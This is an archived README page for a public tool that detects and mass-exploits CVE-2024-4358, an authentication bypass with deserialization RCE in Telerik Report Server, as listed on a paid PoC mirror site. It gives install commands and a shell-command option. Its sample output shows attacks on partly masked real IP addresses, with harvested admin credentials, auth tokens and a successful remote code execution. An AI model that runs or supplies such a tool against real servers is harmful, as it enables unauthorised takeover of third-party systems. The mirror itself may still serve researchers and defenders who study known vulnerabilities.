Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2024-4358 PoC — Registration Authentication Bypass Vulnerability

Source
https://github.com/RevoltSecurities/CVE-2024-4358
Associated Vulnerability
Title:Registration Authentication Bypass Vulnerability (CVE-2024-4358)
Description:In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
Description
An Vulnerability detection and Exploitation tool for CVE-2024-4358
Readme
# CVE-2024-4358
An Vulnerability detection and Mass Exploitation tool for CVE-2024-4358

### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```yaml
python3 exploit.py -h                                                                           


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-4358

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or IP wtih port for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs or IPs for vulnerability detection
  -c COMMAND, --command COMMAND
                        [INF]: Specify a shell command to execute it
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

```

### Sample Usage:
```yaml
python3 exploit.py -l urls.txt -c id -t 10                                                      


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerale]: Report for: http://13.42.129.XXX
 Login Crendentials: Usename: ozsebbQpibJbHpghuNLxutxBOl | Password: NvmpjJucmxtqhOtdFtrxfoguvQ | Authentication Token: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://52.2.58.XX
 Login Crendentials: Usename: pjzgrOrjJXqQyFoubmrcSkHZHC | Password: ZrGVXZqIrgWkuHCgUlkHIeYPG | Authentication Token: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://194.233.XXX.235:83
 Login Crendentials: Usename: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Password: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Authentication Token: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
 Report created: ELHaimYtblAxViEKIXxpdFyOXNlEHb
 Deserialization RCE: Success
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s) 
```

### INFO:
The tool is Developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and  mass exploit the Vulnerability CVE-2024-4358, 
The tool is only for education and ethical purpose only and Developers are not responsible for any illegal exploitations.
File Snapshot

 [4.0K]  /data/pocs/96b2b0f10803bd85e93d62925da7c04fca9bd352
├── [ 14K]  exploit.py
├── [4.1K]  README.md
└── [ 107]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →